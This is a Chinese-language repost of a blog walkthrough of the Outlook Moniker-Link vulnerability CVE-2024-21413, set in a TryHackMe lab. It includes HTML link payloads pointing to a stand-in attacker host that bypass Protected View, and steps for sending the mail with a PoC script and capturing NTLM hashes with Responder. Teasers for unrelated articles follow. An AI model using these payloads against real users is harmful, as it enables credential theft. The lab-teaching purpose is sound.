news 2026/4/26 19:03:18

微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

Moniker-Link微软威胁分析:CVE-2024–21413

作者:#$ubh@nk@r
阅读时间:约3分钟
发布日期:2024年2月23日

简介:各位黑客朋友大家好!今天我将为大家介绍近期微软Outlook产品的一个漏洞。该漏洞于2024年2月13日公布。让我们深入了解其细节以及如何利用它。

此漏洞在处理一种特定类型的超链接(称为Moniker Link)时,能够绕过Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦用户点击该超链接,Outlook就会将用户的NTLMv2凭据发送给攻击者。

漏洞原理展示:

Outlook可以将电子邮件渲染为HTML。此外,Outlook能够解析诸如HTTP和HTTPS之类的超链接。然而,它也可以打开指向特定应用程序的URL,这些被称为Moniker Links。

通常,当触发外部应用程序时,Outlook会弹出安全警告。如果使用的是skypekeyword,那么警告会像这样显示。
这个弹窗是Outlook“受保护的视图”功能的结果。如果攻击者创建一个恶意超链接,同样会产生安全警报。

<p><ahref="file://ATTACKER_MACHINE/test">Click me</a></p>

但是,这个警报可以通过使用一个特殊字符来绕过 →!

<p><ahref="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

利用过程:

要利用此漏洞,我们需要创建一个邮件服务器。你可以在TryHackMe实验室中尝试。

CMNatic帮助我们创建了一个Python脚本,用于通过SMTPServer自动化地向受害者发送邮件。

GitHub - CMNatic/CVE-2024-21413: CVE-2024-21413 PoC for THM Lab
CVE-2024-21413 PoC for THM Lab. 在GitHub上创建账户以贡献CMNatic/CVE-2024-21413的开发。
github.com

现在运行脚本。
注意:请在第31行将Attacker_IP和MAILSERVER_IP修改为受害者的IP地址。
邮件已送达。

现在启动你的Responder来捕获NTLM哈希。

打开受害者的Outlook收件箱。你可以看到邮件已经送达。现在,如果你点击“Click me”,由于那个特殊字符!的存在,将不会弹出安全警报。否则,它会显示警报。

如果你点击了该链接,你将会获得受害者的NTLM哈希。

总结:

以上就是该漏洞的利用方式。

感谢阅读!

如果你喜欢这篇文章,别忘了点赞并关注我,以获取更多文章。

祝黑客之旅愉快~
CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLQKZqtp5udwihyDPFTm5IRv37dlo2W+4VY3z1d0M7aWubJiUxybkI3nx55gCmDWobsitrjS0yiQJF3ZKoUJ66E
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/23 12:32:24

ClickHouse实战:十亿级数据OLAP查询优化

前言 去年公司要搞一个数据分析平台&#xff0c;日志量大概一天3亿条&#xff0c;保留90天&#xff0c;总共约300亿条数据。之前用MySQL分库分表勉强扛着&#xff0c;但复杂查询动不动就几十秒&#xff0c;业务那边已经骂了好几次。 调研了一圈&#xff0c;Druid、Doris、Click…

作者头像 李华
网站建设 2026/4/23 9:12:47

Python 设计模式

Python 设计模式概述 设计模式&#xff08;Design Patterns&#xff09;是软件设计中常见的、可复用的问题解决方案&#xff0c;由 GoF&#xff08;Gang of Four&#xff0c;四人组&#xff09;在1994年的经典书籍《设计模式&#xff1a;可复用面向对象软件的基础》中总结出23…

作者头像 李华
网站建设 2026/4/24 5:37:46

Python 外观模式

Python 中的外观模式&#xff08;Facade Pattern&#xff09; 外观模式是一种结构型设计模式&#xff0c;其核心目的是&#xff1a; 为一个复杂子系统提供一个简单的、统一的接口&#xff0c;隐藏子系统的复杂性&#xff0c;让客户端更容易使用。 形象比喻&#xff1a;就像一…

作者头像 李华
网站建设 2026/4/17 21:30:43

PSMNet立体匹配网络:从理论到实践的完整指南

PSMNet立体匹配网络&#xff1a;从理论到实践的完整指南 【免费下载链接】PSMNet Pyramid Stereo Matching Network (CVPR2018) 项目地址: https://gitcode.com/gh_mirrors/ps/PSMNet PSMNet&#xff08;Pyramid Stereo Matching Network&#xff09;是由Jia-Ren Chang和…

作者头像 李华